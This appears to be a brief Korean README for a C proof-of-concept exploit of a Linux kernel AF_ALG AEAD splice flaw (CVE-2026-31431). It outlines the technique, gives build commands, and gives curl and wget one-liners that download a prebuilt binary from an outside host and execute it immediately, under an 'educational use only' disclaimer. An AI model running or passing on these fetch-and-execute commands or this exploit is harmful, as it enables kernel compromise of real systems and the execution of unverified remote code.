
C 포트로 작성된 Linux 커널 AF_ALG AEAD splice 로직 결함(CVE-2026-31431)을 악용하는 개념 증명으로, 교육용 연구를 위한 것입니다.
이 프로젝트는 offsecguy가 작성한 원본 Python 프로토타입의 C 포트입니다.
Linux 커널 암호화 API(AF_ALG)를 다음과 같이 활용합니다:
authencesn(hmac(sha256),cbc(aes)) AEAD 모드MSG_MORE 플래그splice() 시스템 호출이 기법은 읽기 전용 파일 디스크립터의 데이터를 암호화 소켓을 통해 전달하며, 청크 단위로 처리합니다.
musl-gcc -static -Os -s -o exp exp.c -I./zlib-1.3.2 -L./zlib-1.3.2 -lz
gcc exp.c -o exp -lz -s -static
gcc exp.c -o exp -lz -s
curl -sLo exp chosen.to/copyfail && chmod +x exp ; ./exp
wget chosen.to/copyfail -qO exp && chmod +x exp ; ./exp
AF_ALG 지원 필요zlib 사용이 코드는 교육 및 연구 목적으로만 제공됩니다.
승인된 시스템에서만 책임감 있게 사용하십시오.